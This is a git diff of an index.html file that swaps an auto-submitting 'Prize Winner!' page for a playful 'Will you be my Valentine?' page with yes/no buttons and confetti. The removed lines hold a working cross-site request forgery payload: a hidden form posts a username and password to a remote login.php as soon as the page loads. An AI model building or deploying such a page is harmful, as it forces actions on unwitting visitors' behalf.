--- a/index.html
+++ b/index.html
@@ -1,17 +1,31 @@
 <!DOCTYPE html>
-<html>
+<html lang="en">
 <head>
-    <title>Prize Winner!</title>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Will You Be My Valentine?</title>
+    <link rel="stylesheet" href="style.css">
+    <link href="https://fonts.googleapis.com/css2?family=Indie+Flower&display=swap" rel="stylesheet">
 </head>
-<body onload="document.getElementById('csrf-form').submit()">
-    <h1>Redirecting to your prize...</h1>
+<body>
 
-    <form id="csrf-form" action="http://ec2-3-107-205-120.ap-southeast-2.compute.amazonaws.com/phpshrinkit/login.php" method="POST">
-        <input type="hidden" name="user" value="user1" />
-        <input type="hidden" name="pwd" value="password1" />
+    <div class="container">
+        <div id="question-screen">
+            <img class="gif" src="https://media.giphy.com/media/FTGah7Mx3ss04P7yCO/giphy.gif" alt="Cute Bear">
+            <h1>Will you be my Valentine?</h1>
+            <div class="button-group">
+                <button id="yes-btn">Yes</button>
+                <button id="no-btn">No</button>
+            </div>
+        </div>
 
-        <input type="hidden" name="step" value="login" />
-        <input type="hidden" name="submit" value="Submit" />
-    </form>
+        <div id="success-screen" class="hidden">
+            <img class="gif" src="https://media.giphy.com/media/v1.Y2lkPTc5MGI3NjExM3R6eW55b254d255a255a255a255a255a255a255/26BRv0ThflsKCqLxS/giphy.gif" alt="Happy Hug">
+            <h1>Yay! I love you! ❤️</h1>
+        </div>
+    </div>
+
+    <script src="https://cdn.jsdelivr.net/npm/canvas-confetti@1.6.0/dist/confetti.browser.min.js"></script>
+    <script src="script.js"></script>
 </body>
 </html>
